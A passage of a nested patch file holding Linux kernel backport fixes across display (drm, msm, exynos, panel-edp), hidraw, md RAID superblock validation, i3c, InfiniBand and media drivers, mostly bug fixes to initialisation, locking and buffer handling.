+ static int anx7625_read_hpd_status_p0(struct anx7625_data *ctx)
+ {
+-	int ret;
+-
+-	/* Set irq detect window to 2ms */
+-	ret = anx7625_reg_write(ctx, ctx->i2c.tx_p2_client,
+-				HPD_DET_TIMER_BIT0_7, HPD_TIME & 0xFF);
+-	ret |= anx7625_reg_write(ctx, ctx->i2c.tx_p2_client,
+-				 HPD_DET_TIMER_BIT8_15,
+-				 (HPD_TIME >> 8) & 0xFF);
+-	ret |= anx7625_reg_write(ctx, ctx->i2c.tx_p2_client,
+-				 HPD_DET_TIMER_BIT16_23,
+-				 (HPD_TIME >> 16) & 0xFF);
+-	if (ret < 0)
+-		return ret;
+-
+ 	return anx7625_reg_read(ctx, ctx->i2c.rx_p0_client, SYSTEM_STSTUS);
+ }
+ 
+diff --git a/drivers/gpu/drm/bridge/analogix/anx7625.h b/drivers/gpu/drm/bridge/analogix/anx7625.h
+index 239956199e1b9..164250c8c8b63 100644
+--- a/drivers/gpu/drm/bridge/analogix/anx7625.h
++++ b/drivers/gpu/drm/bridge/analogix/anx7625.h
+@@ -259,6 +259,10 @@
+ #define AP_MIPI_RX_EN BIT(5) /* 1: MIPI RX input in  0: no RX in */
+ #define AP_DISABLE_PD BIT(6)
+ #define AP_DISABLE_DISPLAY BIT(7)
++
++#define GPIO_CTRL_2   0x49
++#define HPD_SOURCE    BIT(6)
++
+ /***************************************************************/
+ /* Register definition of device address 0x84 */
+ #define  MIPI_PHY_CONTROL_3            0x03
+diff --git a/drivers/gpu/drm/drm_file.c b/drivers/gpu/drm/drm_file.c
+index a8b4d918e9a3f..d6a0572984b54 100644
+--- a/drivers/gpu/drm/drm_file.c
++++ b/drivers/gpu/drm/drm_file.c
+@@ -406,7 +406,7 @@ int drm_open(struct inode *inode, struct file *filp)
+ {
+ 	struct drm_device *dev;
+ 	struct drm_minor *minor;
+-	int retcode;
++	int retcode = 0;
+ 	int need_setup = 0;
+ 
+ 	minor = drm_minor_acquire(iminor(inode));
+diff --git a/drivers/gpu/drm/drm_framebuffer.c b/drivers/gpu/drm/drm_framebuffer.c
+index 2dd97473ca105..72ad1715f8e75 100644
+--- a/drivers/gpu/drm/drm_framebuffer.c
++++ b/drivers/gpu/drm/drm_framebuffer.c
+@@ -570,7 +570,7 @@ int drm_mode_getfb2_ioctl(struct drm_device *dev,
+ 	struct drm_mode_fb_cmd2 *r = data;
+ 	struct drm_framebuffer *fb;
+ 	unsigned int i;
+-	int ret;
++	int ret = 0;
+ 
+ 	if (!drm_core_check_feature(dev, DRIVER_MODESET))
+ 		return -EINVAL;
+diff --git a/drivers/gpu/drm/drm_mipi_dsi.c b/drivers/gpu/drm/drm_mipi_dsi.c
+index 853208e8dd736..ef7ec68867df0 100644
+--- a/drivers/gpu/drm/drm_mipi_dsi.c
++++ b/drivers/gpu/drm/drm_mipi_dsi.c
+@@ -346,7 +346,8 @@ static int mipi_dsi_remove_device_fn(struct device *dev, void *priv)
+ {
+ 	struct mipi_dsi_device *dsi = to_mipi_dsi_device(dev);
+ 
+-	mipi_dsi_detach(dsi);
++	if (dsi->attached)
++		mipi_dsi_detach(dsi);
+ 	mipi_dsi_device_unregister(dsi);
+ 
+ 	return 0;
+@@ -369,11 +370,18 @@ EXPORT_SYMBOL(mipi_dsi_host_unregister);
+ int mipi_dsi_attach(struct mipi_dsi_device *dsi)
+ {
+ 	const struct mipi_dsi_host_ops *ops = dsi->host->ops;
++	int ret;
+ 
+ 	if (!ops || !ops->attach)
+ 		return -ENOSYS;
+ 
+-	return ops->attach(dsi->host, dsi);
++	ret = ops->attach(dsi->host, dsi);
++	if (ret)
++		return ret;
++
++	dsi->attached = true;
++
++	return 0;
+ }
+ EXPORT_SYMBOL(mipi_dsi_attach);
+ 
+@@ -385,9 +393,14 @@ int mipi_dsi_detach(struct mipi_dsi_device *dsi)
+ {
+ 	const struct mipi_dsi_host_ops *ops = dsi->host->ops;
+ 
++	if (WARN_ON(!dsi->attached))
++		return -EINVAL;
++
+ 	if (!ops || !ops->detach)
+ 		return -ENOSYS;
+ 
++	dsi->attached = false;
++
+ 	return ops->detach(dsi->host, dsi);
+ }
+ EXPORT_SYMBOL(mipi_dsi_detach);
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_drv.c b/drivers/gpu/drm/exynos/exynos_drm_drv.c
+index 16c539657f730..4095b0d3ac2e3 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_drv.c
++++ b/drivers/gpu/drm/exynos/exynos_drm_drv.c
+@@ -309,6 +309,7 @@ err_mode_config_cleanup:
+ 	drm_mode_config_cleanup(drm);
+ 	exynos_drm_cleanup_dma(drm);
+ 	kfree(private);
++	dev_set_drvdata(dev, NULL);
+ err_free_drm:
+ 	drm_dev_put(drm);
+ 
+@@ -323,6 +324,7 @@ static void exynos_drm_unbind(struct device *dev)
+ 
+ 	exynos_drm_fbdev_fini(drm);
+ 	drm_kms_helper_poll_fini(drm);
++	drm_atomic_helper_shutdown(drm);
+ 
+ 	component_unbind_all(drm->dev, drm);
+ 	drm_mode_config_cleanup(drm);
+@@ -360,9 +362,18 @@ static int exynos_drm_platform_remove(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
++static void exynos_drm_platform_shutdown(struct platform_device *pdev)
++{
++	struct drm_device *drm = platform_get_drvdata(pdev);
++
++	if (drm)
++		drm_atomic_helper_shutdown(drm);
++}
++
+ static struct platform_driver exynos_drm_platform_driver = {
+ 	.probe	= exynos_drm_platform_probe,
+ 	.remove	= exynos_drm_platform_remove,
++	.shutdown = exynos_drm_platform_shutdown,
+ 	.driver	= {
+ 		.name	= "exynos-drm",
+ 		.pm	= &exynos_drm_pm_ops,
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+index b0eb881f8af13..38d38f923df64 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+@@ -38,6 +38,9 @@
+ #define DPU_ERROR_ENC(e, fmt, ...) DPU_ERROR("enc%d " fmt,\
+ 		(e) ? (e)->base.base.id : -1, ##__VA_ARGS__)
+ 
++#define DPU_ERROR_ENC_RATELIMITED(e, fmt, ...) DPU_ERROR_RATELIMITED("enc%d " fmt,\
++		(e) ? (e)->base.base.id : -1, ##__VA_ARGS__)
++
+ /*
+  * Two to anticipate panels that can do cmd/vid dynamic switching
+  * plan is to create all possible physical encoder types, and switch between
+@@ -2385,7 +2388,7 @@ static void dpu_encoder_frame_done_timeout(struct timer_list *t)
+ 		return;
+ 	}
+ 
+-	DPU_ERROR_ENC(dpu_enc, "frame done timeout\n");
++	DPU_ERROR_ENC_RATELIMITED(dpu_enc, "frame done timeout\n");
+ 
+ 	event = DPU_ENCODER_FRAME_EVENT_ERROR;
+ 	trace_dpu_enc_frame_done_timeout(DRMID(drm_enc), event);
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_wb.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_wb.c
+index a3e413d277175..63dc2ee446d47 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_wb.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_wb.c
+@@ -105,6 +105,9 @@ static void dpu_hw_wb_setup_format(struct dpu_hw_wb *ctx,
+ 			dst_format |= BIT(14); /* DST_ALPHA_X */
+ 	}
+ 
++	if (DPU_FORMAT_IS_YUV(fmt))
++		dst_format |= BIT(15);
++
+ 	pattern = (fmt->element[3] << 24) |
+ 		(fmt->element[2] << 16) |
+ 		(fmt->element[1] << 8)  |
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.h b/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.h
+index ed80ed6784eee..bb35aa5f5709f 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.h
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.h
+@@ -51,6 +51,7 @@
+ 	} while (0)
+ 
+ #define DPU_ERROR(fmt, ...) pr_err("[dpu error]" fmt, ##__VA_ARGS__)
++#define DPU_ERROR_RATELIMITED(fmt, ...) pr_err_ratelimited("[dpu error]" fmt, ##__VA_ARGS__)
+ 
+ /**
+  * ktime_compare_safe - compare two ktime structures
+diff --git a/drivers/gpu/drm/msm/dsi/phy/dsi_phy.c b/drivers/gpu/drm/msm/dsi/phy/dsi_phy.c
+index 62bc3756f2e2b..c0bcf020ef662 100644
+--- a/drivers/gpu/drm/msm/dsi/phy/dsi_phy.c
++++ b/drivers/gpu/drm/msm/dsi/phy/dsi_phy.c
+@@ -673,6 +673,10 @@ static int dsi_phy_driver_probe(struct platform_device *pdev)
+ 		return dev_err_probe(dev, PTR_ERR(phy->ahb_clk),
+ 				     "Unable to get ahb clk\n");
+ 
++	ret = devm_pm_runtime_enable(&pdev->dev);
++	if (ret)
++		return ret;
++
+ 	/* PLL init will call into clk_register which requires
+ 	 * register access, so we need to enable power and ahb clock.
+ 	 */
+diff --git a/drivers/gpu/drm/panel/panel-edp.c b/drivers/gpu/drm/panel/panel-edp.c
+index ecd6238749f7a..42584d8a9aeb6 100644
+--- a/drivers/gpu/drm/panel/panel-edp.c
++++ b/drivers/gpu/drm/panel/panel-edp.c
+@@ -203,6 +203,9 @@ struct edp_panel_entry {
+ 
+ 	/** @name: Name of this panel (for printing to logs). */
+ 	const char *name;
++
++	/** @override_edid_mode: Override the mode obtained by edid. */
++	const struct drm_display_mode *override_edid_mode;
+ };
+ 
+ struct panel_edp {
+@@ -301,6 +304,24 @@ static unsigned int panel_edp_get_display_modes(struct panel_edp *panel,
+ 	return num;
+ }
+ 
++static int panel_edp_override_edid_mode(struct panel_edp *panel,
++					struct drm_connector *connector,
++					const struct drm_display_mode *override_mode)
++{
++	struct drm_display_mode *mode;
++
++	mode = drm_mode_duplicate(connector->dev, override_mode);
++	if (!mode) {
++		dev_err(panel->base.dev, "failed to add additional mode\n");
++		return 0;
++	}
++
++	mode->type |= DRM_MODE_TYPE_DRIVER | DRM_MODE_TYPE_PREFERRED;
++	drm_mode_set_name(mode);
++	drm_mode_probed_add(connector, mode);
++	return 1;
++}
++
+ static int panel_edp_get_non_edid_modes(struct panel_edp *panel,
+ 					struct drm_connector *connector)
+ {
+@@ -568,6 +589,9 @@ static int panel_edp_get_modes(struct drm_panel *panel,
+ {
+ 	struct panel_edp *p = to_panel_edp(panel);
+ 	int num = 0;
++	bool has_override_edid_mode = p->detected_panel &&
++				      p->detected_panel != ERR_PTR(-EINVAL) &&
++				      p->detected_panel->override_edid_mode;
+ 
+ 	/* probe EDID if a DDC bus is available */
+ 	if (p->ddc) {
+@@ -575,9 +599,18 @@ static int panel_edp_get_modes(struct drm_panel *panel,
+ 
+ 		if (!p->edid)
+ 			p->edid = drm_get_edid(connector, p->ddc);
+-
+-		if (p->edid)
+-			num += drm_add_edid_modes(connector, p->edid);
++		if (p->edid) {
++			if (has_override_edid_mode) {
++				/*
++				 * override_edid_mode is specified. Use
++				 * override_edid_mode instead of from edid.
++				 */
++				num += panel_edp_override_edid_mode(p, connector,
++						p->detected_panel->override_edid_mode);
++			} else {
++				num += drm_add_edid_modes(connector, p->edid);
++			}
++		}
+ 
+ 		pm_runtime_mark_last_busy(panel->dev);
+ 		pm_runtime_put_autosuspend(panel->dev);
+@@ -1861,6 +1894,15 @@ static const struct panel_delay delay_200_500_e200 = {
+ 	.delay = _delay \
+ }
+ 
++#define EDP_PANEL_ENTRY2(vend_chr_0, vend_chr_1, vend_chr_2, product_id, _delay, _name, _mode) \
++{ \
++	.name = _name, \
++	.panel_id = drm_edid_encode_panel_id(vend_chr_0, vend_chr_1, vend_chr_2, \
++					     product_id), \
++	.delay = _delay, \
++	.override_edid_mode = _mode \
++}
++
+ /*
+  * This table is used to figure out power sequencing delays for panels that
+  * are detected by EDID. Entries here may point to entries in the
+diff --git a/drivers/hid/hidraw.c b/drivers/hid/hidraw.c
+index b617aada50b06..7b097ab2170c3 100644
+--- a/drivers/hid/hidraw.c
++++ b/drivers/hid/hidraw.c
+@@ -355,8 +355,11 @@ static int hidraw_release(struct inode * inode, struct file * file)
+ 	down_write(&minors_rwsem);
+ 
+ 	spin_lock_irqsave(&hidraw_table[minor]->list_lock, flags);
+-	for (int i = list->tail; i < list->head; i++)
+-		kfree(list->buffer[i].value);
++	while (list->tail != list->head) {
++		kfree(list->buffer[list->tail].value);
++		list->buffer[list->tail].value = NULL;
++		list->tail = (list->tail + 1) & (HIDRAW_BUFFER_SIZE - 1);
++	}
+ 	list_del(&list->node);
+ 	spin_unlock_irqrestore(&hidraw_table[minor]->list_lock, flags);
+ 	kfree(list);
+diff --git a/drivers/hwmon/nct6775-core.c b/drivers/hwmon/nct6775-core.c
+index 80310845fb993..9720ad214c20b 100644
+--- a/drivers/hwmon/nct6775-core.c
++++ b/drivers/hwmon/nct6775-core.c
+@@ -2462,6 +2462,13 @@ store_pwm(struct device *dev, struct device_attribute *attr, const char *buf,
+ 	int err;
+ 	u16 reg;
+ 
++	/*
++	 * The fan control mode should be set to manual if the user wants to adjust
++	 * the fan speed. Otherwise, it will fail to set.
++	 */
++	if (index == 0 && data->pwm_enable[nr] > manual)
++		return -EBUSY;
++
+ 	err = kstrtoul(buf, 10, &val);
+ 	if (err < 0)
+ 		return err;
+diff --git a/drivers/i3c/master/i3c-master-cdns.c b/drivers/i3c/master/i3c-master-cdns.c
+index 4a49c75a9408c..b9cfda6ae9ae5 100644
+--- a/drivers/i3c/master/i3c-master-cdns.c
++++ b/drivers/i3c/master/i3c-master-cdns.c
+@@ -77,7 +77,8 @@
+ #define PRESCL_CTRL0			0x14
+ #define PRESCL_CTRL0_I2C(x)		((x) << 16)
+ #define PRESCL_CTRL0_I3C(x)		(x)
+-#define PRESCL_CTRL0_MAX		GENMASK(9, 0)
++#define PRESCL_CTRL0_I3C_MAX		GENMASK(9, 0)
++#define PRESCL_CTRL0_I2C_MAX		GENMASK(15, 0)
+ 
+ #define PRESCL_CTRL1			0x18
+ #define PRESCL_CTRL1_PP_LOW_MASK	GENMASK(15, 8)
+@@ -1234,7 +1235,7 @@ static int cdns_i3c_master_bus_init(struct i3c_master_controller *m)
+ 		return -EINVAL;
+ 
+ 	pres = DIV_ROUND_UP(sysclk_rate, (bus->scl_rate.i3c * 4)) - 1;
+-	if (pres > PRESCL_CTRL0_MAX)
++	if (pres > PRESCL_CTRL0_I3C_MAX)
+ 		return -ERANGE;
+ 
+ 	bus->scl_rate.i3c = sysclk_rate / ((pres + 1) * 4);
+@@ -1247,7 +1248,7 @@ static int cdns_i3c_master_bus_init(struct i3c_master_controller *m)
+ 	max_i2cfreq = bus->scl_rate.i2c;
+ 
+ 	pres = (sysclk_rate / (max_i2cfreq * 5)) - 1;
+-	if (pres > PRESCL_CTRL0_MAX)
++	if (pres > PRESCL_CTRL0_I2C_MAX)
+ 		return -ERANGE;
+ 
+ 	bus->scl_rate.i2c = sysclk_rate / ((pres + 1) * 5);
+diff --git a/drivers/infiniband/ulp/ipoib/ipoib_multicast.c b/drivers/infiniband/ulp/ipoib/ipoib_multicast.c
+index 5b3154503bf49..319d4288eddde 100644
+--- a/drivers/infiniband/ulp/ipoib/ipoib_multicast.c
++++ b/drivers/infiniband/ulp/ipoib/ipoib_multicast.c
+@@ -531,21 +531,18 @@ static int ipoib_mcast_join(struct net_device *dev, struct ipoib_mcast *mcast)
+ 		if (test_bit(IPOIB_MCAST_FLAG_SENDONLY, &mcast->flags))
+ 			rec.join_state = SENDONLY_FULLMEMBER_JOIN;
+ 	}
+-	spin_unlock_irq(&priv->lock);
+ 
+ 	multicast = ib_sa_join_multicast(&ipoib_sa_client, priv->ca, priv->port,
+-					 &rec, comp_mask, GFP_KERNEL,
++					 &rec, comp_mask, GFP_ATOMIC,
+ 					 ipoib_mcast_join_complete, mcast);
+-	spin_lock_irq(&priv->lock);
+ 	if (IS_ERR(multicast)) {
+ 		ret = PTR_ERR(multicast);
+ 		ipoib_warn(priv, "ib_sa_join_multicast failed, status %d\n", ret);
+ 		/* Requeue this join task with a backoff delay */
+ 		__ipoib_mcast_schedule_join_thread(priv, mcast, 1);
+ 		clear_bit(IPOIB_MCAST_FLAG_BUSY, &mcast->flags);
+-		spin_unlock_irq(&priv->lock);
+ 		complete(&mcast->done);
+-		spin_lock_irq(&priv->lock);
++		return ret;
+ 	}
+ 	return 0;
+ }
+diff --git a/drivers/leds/trigger/ledtrig-panic.c b/drivers/leds/trigger/ledtrig-panic.c
+index 64abf2e91608a..5a6b21bfeb9af 100644
+--- a/drivers/leds/trigger/ledtrig-panic.c
++++ b/drivers/leds/trigger/ledtrig-panic.c
+@@ -64,10 +64,13 @@ static long led_panic_blink(int state)
+ 
+ static int __init ledtrig_panic_init(void)
+ {
++	led_trigger_register_simple("panic", &trigger);
++	if (!trigger)
++		return -ENOMEM;
++
+ 	atomic_notifier_chain_register(&panic_notifier_list,
+ 				       &led_trigger_panic_nb);
+ 
+-	led_trigger_register_simple("panic", &trigger);
+ 	panic_blink = led_panic_blink;
+ 	return 0;
+ }
+diff --git a/drivers/mailbox/arm_mhuv2.c b/drivers/mailbox/arm_mhuv2.c
+index c6d4957c4da83..0ec21dcdbde72 100644
+--- a/drivers/mailbox/arm_mhuv2.c
++++ b/drivers/mailbox/arm_mhuv2.c
+@@ -553,7 +553,8 @@ static irqreturn_t mhuv2_sender_interrupt(int irq, void *data)
+ 	priv = chan->con_priv;
+ 
+ 	if (!IS_PROTOCOL_DOORBELL(priv)) {
+-		writel_relaxed(1, &mhu->send->ch_wn[priv->ch_wn_idx + priv->windows - 1].int_clr);
++		for (i = 0; i < priv->windows; i++)
++			writel_relaxed(1, &mhu->send->ch_wn[priv->ch_wn_idx + i].int_clr);
+ 
+ 		if (chan->cl) {
+ 			mbox_chan_txdone(chan, 0);
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 6120f26a79696..3ccf1920682cb 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -1145,6 +1145,7 @@ struct super_type  {
+ 					  struct md_rdev *refdev,
+ 					  int minor_version);
+ 	int		    (*validate_super)(struct mddev *mddev,
++					      struct md_rdev *freshest,
+ 					      struct md_rdev *rdev);
+ 	void		    (*sync_super)(struct mddev *mddev,
+ 					  struct md_rdev *rdev);
+@@ -1282,8 +1283,9 @@ static int super_90_load(struct md_rdev *rdev, struct md_rdev *refdev, int minor
+ 
+ /*
+  * validate_super for 0.90.0
++ * note: we are not using "freshest" for 0.9 superblock
+  */
+-static int super_90_validate(struct mddev *mddev, struct md_rdev *rdev)
++static int super_90_validate(struct mddev *mddev, struct md_rdev *freshest, struct md_rdev *rdev)
+ {
+ 	mdp_disk_t *desc;
+ 	mdp_super_t *sb = page_address(rdev->sb_page);
+@@ -1795,7 +1797,7 @@ static int super_1_load(struct md_rdev *rdev, struct md_rdev *refdev, int minor_
+ 	return ret;
+ }
+ 
+-static int super_1_validate(struct mddev *mddev, struct md_rdev *rdev)
++static int super_1_validate(struct mddev *mddev, struct md_rdev *freshest, struct md_rdev *rdev)
+ {
+ 	struct mdp_superblock_1 *sb = page_address(rdev->sb_page);
+ 	__u64 ev1 = le64_to_cpu(sb->events);
+@@ -1891,13 +1893,15 @@ static int super_1_validate(struct mddev *mddev, struct md_rdev *rdev)
+ 		}
+ 	} else if (mddev->pers == NULL) {
+ 		/* Insist of good event counter while assembling, except for
+-		 * spares (which don't need an event count) */
+-		++ev1;
++		 * spares (which don't need an event count).
++		 * Similar to mdadm, we allow event counter difference of 1
++		 * from the freshest device.
++		 */
+ 		if (rdev->desc_nr >= 0 &&
+ 		    rdev->desc_nr < le32_to_cpu(sb->max_dev) &&
+ 		    (le16_to_cpu(sb->dev_roles[rdev->desc_nr]) < MD_DISK_ROLE_MAX ||
+ 		     le16_to_cpu(sb->dev_roles[rdev->desc_nr]) == MD_DISK_ROLE_JOURNAL))
+-			if (ev1 < mddev->events)
++			if (ev1 + 1 < mddev->events)
+ 				return -EINVAL;
+ 	} else if (mddev->bitmap) {
+ 		/* If adding to array with a bitmap, then we can accept an
+@@ -1918,8 +1922,38 @@ static int super_1_validate(struct mddev *mddev, struct md_rdev *rdev)
+ 		    rdev->desc_nr >= le32_to_cpu(sb->max_dev)) {
+ 			role = MD_DISK_ROLE_SPARE;
+ 			rdev->desc_nr = -1;
+-		} else
++		} else if (mddev->pers == NULL && freshest && ev1 < mddev->events) {
++			/*
++			 * If we are assembling, and our event counter is smaller than the
++			 * highest event counter, we cannot trust our superblock about the role.
++			 * It could happen that our rdev was marked as Faulty, and all other
++			 * superblocks were updated with +1 event counter.
++			 * Then, before the next superblock update, which typically happens when
++			 * remove_and_add_spares() removes the device from the array, there was
++			 * a crash or reboot.
++			 * If we allow current rdev without consulting the freshest superblock,
++			 * we could cause data corruption.
++			 * Note that in this case our event counter is smaller by 1 than the
++			 * highest, otherwise, this rdev would not be allowed into array;
++			 * both kernel and mdadm allow event counter difference of 1.
++			 */
++			struct mdp_superblock_1 *freshest_sb = page_address(freshest->sb_page);
++			u32 freshest_max_dev = le32_to_cpu(freshest_sb->max_dev);
++
++			if (rdev->desc_nr >= freshest_max_dev) {
++				/* this is unexpected, better not proceed */
++				pr_warn("md: %s: rdev[%pg]: desc_nr(%d) >= freshest(%pg)->sb->max_dev(%u)\n",
++						mdname(mddev), rdev->bdev, rdev->desc_nr,
++						freshest->bdev, freshest_max_dev);
++				return -EUCLEAN;
++			}
++
++			role = le16_to_cpu(freshest_sb->dev_roles[rdev->desc_nr]);
++			pr_debug("md: %s: rdev[%pg]: role=%d(0x%x) according to freshest %pg\n",
++				     mdname(mddev), rdev->bdev, role, role, freshest->bdev);
++		} else {
+ 			role = le16_to_cpu(sb->dev_roles[rdev->desc_nr]);
++		}
+ 		switch(role) {
+ 		case MD_DISK_ROLE_SPARE: /* spare */
+ 			break;
+@@ -2861,7 +2895,7 @@ static int add_bound_rdev(struct md_rdev *rdev)
+ 		 * and should be added immediately.
+ 		 */
+ 		super_types[mddev->major_version].
+-			validate_super(mddev, rdev);
++			validate_super(mddev, NULL/*freshest*/, rdev);
+ 		if (add_journal)
+ 			mddev_suspend(mddev);
+ 		err = mddev->pers->hot_add_disk(mddev, rdev);
+@@ -3775,7 +3809,7 @@ static int analyze_sbs(struct mddev *mddev)
+ 	}
+ 
+ 	super_types[mddev->major_version].
+-		validate_super(mddev, freshest);
++		validate_super(mddev, NULL/*freshest*/, freshest);
+ 
+ 	i = 0;
+ 	rdev_for_each_safe(rdev, tmp, mddev) {
+@@ -3790,7 +3824,7 @@ static int analyze_sbs(struct mddev *mddev)
+ 		}
+ 		if (rdev != freshest) {
+ 			if (super_types[mddev->major_version].
+-			    validate_super(mddev, rdev)) {
++			    validate_super(mddev, freshest, rdev)) {
+ 				pr_warn("md: kicking non-fresh %pg from array!\n",
+ 					rdev->bdev);
+ 				md_kick_rdev_from_array(rdev);
+@@ -6804,7 +6838,7 @@ int md_add_new_disk(struct mddev *mddev, struct mdu_disk_info_s *info)
+ 			rdev->saved_raid_disk = rdev->raid_disk;
+ 		} else
+ 			super_types[mddev->major_version].
+-				validate_super(mddev, rdev);
++				validate_super(mddev, NULL/*freshest*/, rdev);
+ 		if ((info->state & (1<<MD_DISK_SYNC)) &&
+ 		     rdev->raid_disk != info->raid_disk) {
+ 			/* This was a hot-add request, but events doesn't
+diff --git a/drivers/media/i2c/imx335.c b/drivers/media/i2c/imx335.c
+index 078ede2b7a00f..8e91767d61300 100644
+--- a/drivers/media/i2c/imx335.c
++++ b/drivers/media/i2c/imx335.c
+@@ -971,8 +971,8 @@ static int imx335_init_controls(struct imx335 *imx335)
+ 	imx335->hblank_ctrl = v4l2_ctrl_new_std(ctrl_hdlr,
+ 						&imx335_ctrl_ops,
+ 						V4L2_CID_HBLANK,
+-						IMX335_REG_MIN,
+-						IMX335_REG_MAX,
++						mode->hblank,
++						mode->hblank,
+ 						1, mode->hblank);
+ 	if (imx335->hblank_ctrl)
+ 		imx335->hblank_ctrl->flags |= V4L2_CTRL_FLAG_READ_ONLY;
+diff --git a/drivers/media/pci/ddbridge/ddbridge-main.c b/drivers/media/pci/ddbridge/ddbridge-main.c
+index 91733ab9f58c3..363badab7cf07 100644
+--- a/drivers/media/pci/ddbridge/ddbridge-main.c
++++ b/drivers/media/pci/ddbridge/ddbridge-main.c
+@@ -238,7 +238,7 @@ fail:
+ 	ddb_unmap(dev);
+ 	pci_set_drvdata(pdev, NULL);
+ 	pci_disable_device(pdev);
+-	return -1;
++	return stat;
+ }
+ 
+ /****************************************************************************/
+diff --git a/drivers/media/platform/amphion/vpu.h b/drivers/media/platform/amphion/vpu.h
+index deb2288d42904..4f3d23b55b6da 100644
+--- a/drivers/media/platform/amphion/vpu.h
++++ b/drivers/media/platform/amphion/vpu.h
+@@ -152,7 +152,6 @@ struct vpu_core {
+ 	struct vpu_mbox tx_type;
+ 	struct vpu_mbox tx_data;
+ 	struct vpu_mbox rx;
+-	unsigned long cmd_seq;
+ 
+ 	wait_queue_head_t ack_wq;
+ 	struct completion cmp;
+@@ -251,6 +250,8 @@ struct vpu_inst {
+ 
+ 	struct list_head cmd_q;
+ 	void *pending;
++	unsigned long cmd_seq;
++	atomic_long_t last_response_cmd;
+ 
+ 	struct vpu_inst_ops *ops;
+ 	const struct vpu_format *formats;
+diff --git a/drivers/media/platform/amphion/vpu_cmds.c b/drivers/media/platform/amphion/vpu_cmds.c
+index 235b71398d403..c68163af29dc6 100644
+--- a/drivers/media/platform/amphion/vpu_cmds.c
++++ b/drivers/media/platform/amphion/vpu_cmds.c
+@@ -34,6 +34,7 @@ struct vpu_cmd_t {
+ 	struct vpu_cmd_request *request;
+ 	struct vpu_rpc_event *pkt;
+ 	unsigned long key;
++	atomic_long_t *last_response_cmd;
+ };
+ 
+ static struct vpu_cmd_request vpu_cmd_requests[] = {
+@@ -117,6 +118,8 @@ static void vpu_free_cmd(struct vpu_cmd_t *cmd)
+ {
+ 	if (!cmd)
+ 		return;
++	if (cmd->last_response_cmd)
++		atomic_long_set(cmd->last_response_cmd, cmd->key);
+ 	vfree(cmd->pkt);
+ 	vfree(cmd);
+ }
+@@ -174,7 +177,8 @@ static int vpu_request_cmd(struct vpu_inst *inst, u32 id, void *data,
+ 		return -ENOMEM;
+ 
+ 	mutex_lock(&core->cmd_lock);
+-	cmd->key = core->cmd_seq++;
++	cmd->key = ++inst->cmd_seq;
++	cmd->last_response_cmd = &inst->last_response_cmd;
+ 	if (key)
+ 		*key = cmd->key;
+ 	if (sync)
+@@ -248,26 +252,12 @@ void vpu_clear_request(struct vpu_inst *inst)
+ 
+ static bool check_is_responsed(struct vpu_inst *inst, unsigned long key)
+ {
+-	struct vpu_core *core = inst->core;
+-	struct vpu_cmd_t *cmd;
+-	bool flag = true;
++	unsigned long last_response = atomic_long_read(&inst->last_response_cmd);
+ 
+-	mutex_lock(&core->cmd_lock);
+-	cmd = inst->pending;
+-	if (cmd && key == cmd->key) {
+-		flag = false;
+-		goto exit;
+-	}
+-	list_for_each_entry(cmd, &inst->cmd_q, list) {
+-		if (key == cmd->key) {
+-			flag = false;
+-			break;
+-		}
+-	}
+-exit:
+-	mutex_unlock(&core->cmd_lock);
++	if (key <= last_response && (last_response - key) < (ULONG_MAX >> 1))
++		return true;
+ 
+-	return flag;
++	return false;
+ }
+ 
+ static int sync_session_response(struct vpu_inst *inst, unsigned long key, long timeout, int try)
+diff --git a/drivers/media/platform/amphion/vpu_v4l2.c b/drivers/media/platform/amphion/vpu_v4l2.c
+index e5c8e1a753ccd..e7a18948c4ab0 100644
+--- a/drivers/media/platform/amphion/vpu_v4l2.c
++++ b/drivers/media/platform/amphion/vpu_v4l2.c
+@@ -631,6 +631,7 @@ int vpu_v4l2_open(struct file *file, struct vpu_inst *inst)
+ 		func = &vpu->decoder;
+ 
+ 	atomic_set(&inst->ref_count, 0);
++	atomic_long_set(&inst->last_response_cmd, 0);
+ 	vpu_inst_get(inst);
+ 	inst->vpu = vpu;
+ 	inst->core = vpu_request_core(vpu, inst->type);
+diff --git a/drivers/media/platform/rockchip/rga/rga.c b/drivers/media/platform/rockchip/rga/rga.c
+index 61b25fcf826e9..9b20cef5afc61 100644
+--- a/drivers/media/platform/rockchip/rga/rga.c
++++ b/drivers/media/platform/rockchip/rga/rga.c
+@@ -187,25 +187,16 @@ static int rga_setup_ctrls(struct rga_ctx *ctx)
+ static struct rga_fmt formats[] = {
+ 	{
+ 		.fourcc = V4L2_PIX_FMT_ARGB32,
+-		.color_swap = RGA_COLOR_RB_SWAP,
++		.color_swap = RGA_COLOR_ALPHA_SWAP,
+ 		.hw_format = RGA_COLOR_FMT_ABGR8888,
+ 		.depth = 32,
+ 		.uv_factor = 1,
+ 		.y_div = 1,
+ 		.x_div = 1,
+ 	},
+-	{
+-		.fourcc = V4L2_PIX_FMT_XRGB32,
+-		.color_swap = RGA_COLOR_RB_SWAP,
+-		.hw_format = RGA_COLOR_FMT_XBGR8888,
+-		.depth = 32,
+-		.uv_factor = 1,
+-		.y_div = 1,
+-		.x_div = 1,
+-	},
+ 	{
+ 		.fourcc = V4L2_PIX_FMT_ABGR32,
+-		.color_swap = RGA_COLOR_ALPHA_SWAP,
++		.color_swap = RGA_COLOR_RB_SWAP,
+ 		.hw_format = RGA_COLOR_FMT_ABGR8888,
+ 		.depth = 32,
+ 		.uv_factor = 1,
+@@ -214,7 +205,7 @@ static struct rga_fmt formats[] = {
+ 	},
+ 	{
+ 		.fourcc = V4L2_PIX_FMT_XBGR32,
+-		.color_swap = RGA_COLOR_ALPHA_SWAP,
